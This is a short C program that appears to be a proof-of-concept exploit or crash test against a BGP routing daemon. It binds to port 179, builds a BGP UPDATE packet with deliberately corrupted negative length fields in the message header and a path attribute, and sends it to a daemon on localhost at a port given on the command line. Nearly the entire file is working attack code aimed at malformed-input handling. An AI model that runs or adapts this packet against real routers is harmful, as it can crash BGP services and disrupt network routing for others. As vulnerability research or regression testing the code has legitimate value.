#include <sys/socket.h>
#include <netinet/in.h>
#include <limits.h>
int
main(int argc, char *argv[])
{
	unsigned char bgp_marker[1024] = {
		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
		0x00, 0x00,	/* length	*/
		0x02,		/* type		*/

//		0x00,		/* flags	*/
		0x0A,		/* type		*/
		0xff, 0xff	/* len / elen	*/
		/* A A o + 2 */
		/* A A o + 2 + 2 */
		/* bgpa */
	};
	int s;
	int ret;
	struct sockaddr_in sin;

	if (argc != 2) exit(1);
	*(short *)&bgp_marker[16] = htons(-10000);
	*(short *)&bgp_marker[19 + 2] = htons(-8);
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	sin.sin_port = htons(179);
	sin.sin_addr.s_addr = INADDR_ANY;
	sin.sin_family = AF_INET;
	ret = bind(s, (struct sockaddr *)&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_port = htons(atoi(argv[1]));
	sin.sin_addr.s_addr = inet_addr("127.0.0.1");
	ret = connect(s, (struct sockaddr *)&sin, sizeof(sin));
	write(s, bgp_marker, sizeof(bgp_marker));
	exit(0);
}
